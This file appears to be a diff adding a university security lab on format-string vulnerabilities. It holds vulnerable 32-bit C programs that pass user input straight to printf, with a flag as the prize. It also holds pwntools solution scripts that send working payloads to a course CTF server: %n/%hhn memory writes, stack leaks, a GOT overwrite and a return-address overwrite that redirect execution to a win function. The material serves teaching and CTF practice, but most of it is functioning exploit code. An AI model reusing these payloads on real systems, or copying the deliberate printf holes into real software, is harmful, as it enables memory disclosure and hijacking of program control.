Lab7

pa/lab7/01_local_read.c

@@ -0,0 +1,20 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <unistd.h>
+#include "get_flag.h"
+
+#define BUFFER_LEN 64
+
+char buffer[BUFFER_LEN] = {0};
+
+void vuln() {
+    // Never prints secret_value
+    char *secret_value = get_flag();
+    printf(buffer);
+}
+
+int main() {
+    read(0, buffer, BUFFER_LEN-1);
+    vuln();
+}

pa/lab7/03_write.c

@@ -0,0 +1,27 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <unistd.h>
+#include "get_flag.h"
+
+#define BUFFER_LEN 128
+
+unsigned int target = 0;
+
+void vuln() {
+    char buffer[BUFFER_LEN] = {0};
+    read(0, buffer, BUFFER_LEN-1);
+
+    printf(buffer);
+
+    if (target != 0) {
+        printf("Success! You hit the target!\n");
+        printf("Here is your flag: %s\n", get_flag());
+    } else {
+        printf("Oops, not quite!\n");
+    }
+}
+
+int main() {
+    vuln();
+}

pa/lab7/04_match_value.c

@@ -0,0 +1,27 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <unistd.h>
+#include "get_flag.h"
+
+#define BUFFER_LEN 128
+
+unsigned int target = 0;
+
+void vuln() {
+    char buffer[BUFFER_LEN] = {0};
+    read(0, buffer, BUFFER_LEN-1);
+
+    printf(buffer);
+
+    if (target == 327) {
+        printf("Success! You hit the target!\n");
+        printf("Here is your flag: %s\n", get_flag());
+    } else {
+        printf("Oops, not quite! The target was: 327\nCurrent value is %d.\n", target);
+    }
+}
+
+int main() {
+    vuln();
+}

pa/lab7/05_write_specific_byte.c

@@ -0,0 +1,29 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <unistd.h>
+#include "get_flag.h"
+
+#define BUFFER_LEN 128
+
+unsigned int target_before = 0;
+unsigned int target = 0;
+unsigned int target_after = 0;
+
+void vuln() {
+    char buffer[BUFFER_LEN] = {0};
+    read(0, buffer, BUFFER_LEN-1);
+
+    printf(buffer);
+
+    if (((target >> 24) & 0xff) == 2) {
+        printf("Success! You hit the target!\n");
+        printf("Here is your flag: %s\n", get_flag());
+    } else {
+        printf("Oops, not quite! The target was: 2\nCurrent value is %x.\n", target >> 24);
+    }
+}
+
+int main() {
+    vuln();
+}

pa/lab7/06_write_big_number.c

@@ -0,0 +1,29 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <unistd.h>
+#include "get_flag.h"
+
+#define BUFFER_LEN 128
+
+unsigned int target_before = 0;
+unsigned int target = 0;
+unsigned int target_after = 0;
+
+void vuln() {
+    char buffer[BUFFER_LEN] = {0};
+    read(0, buffer, BUFFER_LEN-1);
+
+    printf(buffer);
+
+    if (target == 0xdeadbeef) {
+        printf("Success! You hit the target!\n");
+        printf("Here is your flag: %s\n", get_flag());
+    } else {
+        printf("Oops, not quite! The target was: 0xdeadbeef\nCurrent value is 0x%08x\n", target);
+    }
+}
+
+int main() {
+    vuln();
+}

pa/lab7/07_call_functions.c

@@ -0,0 +1,24 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+#define BUFFER_LEN 128
+
+void win() {
+    printf("You win!");
+    system("cat /home/ctf/flag");
+}
+
+void vuln() {
+    char buffer[BUFFER_LEN] = {0};
+    read(0, buffer, BUFFER_LEN-1);
+
+    printf(buffer);
+    puts("Bye!\n");
+}
+
+int main() {
+    vuln();
+}

pa/lab7/08_return.c

@@ -0,0 +1,23 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+#define BUFFER_LEN 128
+
+void win() {
+    printf("You win!");
+    system("cat /home/ctf/flag");
+}
+
+void vuln() {
+    char buffer[BUFFER_LEN] = {0};
+    read(0, buffer, BUFFER_LEN-1);
+
+    printf(buffer);
+}
+
+int main() {
+    vuln();
+}

pa/lab7/chall_call_functions_again.py

@@ -0,0 +1,42 @@
+from pwn import remote, process, p32, ELF
+
+# Does not deal with \0s in any pointers needed
+def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
+	addrs: bytes = b""
+	writes: bytes = b""
+	cum_chars: int = 4 * len(data)
+
+	for offset in range(len(data)):
+		addr = base + offset
+		addrs += p32(addr)
+		arg_n = arg_base + offset
+		n = data[offset] - (cum_chars % 256)
+		if n < 8: n += 256
+		print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
+		write = f"%{n}x%{arg_n}$hhn"
+		print(write)
+		writes += write.encode('utf-8')
+		cum_chars += n
+
+	pl = addrs + writes
+	if b"\0" in pl: raise Exception("Payload requires a \\0")
+	return pl
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25197
+
+conn = remote(HOST, PORT)
+#conn = process("07_call_functions")
+#input()
+
+elf = ELF("07_call_functions")
+got_puts = elf.got['puts']
+win = elf.sym['win']
+pl = print_to_ram(got_puts, 7, p32(win)) + b"\n"
+print(f"Payload: ({len(pl)})", pl, "\n\n")
+
+#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)

pa/lab7/chall_local_read.py

@@ -0,0 +1,12 @@
+from pwn import remote
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25191
+
+conn = remote(HOST, PORT)
+
+pl = b"%7$s\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)

pa/lab7/chall_return_address_again.py

@@ -0,0 +1,41 @@
+from pwn import remote, process, p32, ELF
+
+# Does not deal with \0s in any pointers needed
+def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
+	addrs: bytes = b""
+	writes: bytes = b""
+	cum_chars: int = 4 * len(data)
+
+	for offset in range(len(data)):
+		addr = base + offset
+		addrs += p32(addr)
+		arg_n = arg_base + offset
+		n = data[offset] - (cum_chars % 256)
+		if n < 8: n += 256
+		write = f"%{n}x%{arg_n}$hhn"
+		writes += write.encode('utf-8')
+		cum_chars += n
+
+	pl = addrs + writes
+	if b"\0" in pl: raise Exception("Payload requires a \\0")
+	return pl
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25198
+
+conn = remote(HOST, PORT)
+#conn = process("08_return")
+#input()
+
+elf = ELF("08_return")
+# dest local is ffffcc1c, which is 1$ + 144
+# remote 1$ is ffffdc6c, so dest should be ffffdc5c
+dest = 0xffffdcfc
+win = elf.sym['win']
+pl = print_to_ram(dest, 7, p32(win)) + b"%3$08x\n"
+print(f"Win={hex(win)} Payload: ({len(pl)})", pl, "\n\n")
+
+#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+conn.interactive()

pa/lab7/chall_short_local_read.py

@@ -0,0 +1,12 @@
+from pwn import remote
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25192
+
+conn = remote(HOST, PORT)
+
+pl = b"%7$s\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)

pa/lab7/chall_write_big_numbers.py

@@ -0,0 +1,38 @@
+from pwn import remote, process, p32
+
+# Does not deal with \0s in any pointers needed
+def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
+	addrs: bytes = b""
+	writes: bytes = b""
+	cum_chars: int = 4 * len(data)
+
+	for offset in range(len(data)):
+		addr = base + offset
+		addrs += p32(addr)
+		arg_n = arg_base + offset
+		n = data[offset] - (cum_chars % 256)
+		if n < 8: n += 256
+		print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
+		write = f"%{n}x%{arg_n}$hhn"
+		print(write)
+		writes += write.encode('utf-8')
+		cum_chars += n
+
+	pl = addrs + writes
+	if b"\0" in pl: raise Exception("Payload requires a \\0")
+	return pl
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25196
+
+conn = remote(HOST, PORT)
+#conn = process("06_write_big_number")
+#input()
+
+pl = print_to_ram(0x804c044, 7, p32(0xdeadbeef)) + b"\n"
+print(f"Payload: ({len(pl)})", pl, "\n\n")
+#pl = "AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)

pa/lab7/chall_write_specific_byte.py

@@ -0,0 +1,18 @@
+from pwn import remote, process, p32
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25195
+
+conn = remote(HOST, PORT)
+#conn = process("05_write_specific_byte")
+#input()
+
+tgt_addr = p32(0x804c044+3)
+
+#2 + 256 - 4(ptr) = 254
+pl = tgt_addr+b"%0254x%7$hhn\n"
+#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)

pa/lab7/chall_write_specific_value.py

@@ -0,0 +1,18 @@
+from pwn import remote, process, p32
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25194
+
+conn = remote(HOST, PORT)
+#conn = process("04_match_value")
+#input()
+
+tgt_addr = p32(0x804c040)
+
+#327 - 4(ptr) = 323
+pl = tgt_addr+b"%0323x%7$hn\n"
+#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)

pa/lab7/chall_write_to_memory.py

@@ -0,0 +1,16 @@
+from pwn import remote, process, p32
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25193
+
+conn = remote(HOST, PORT)
+#conn = process("03_write")
+#input()
+
+tgt_addr = p32(0x804c040)
+
+pl = tgt_addr+b"AAAA.%7$hhn\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)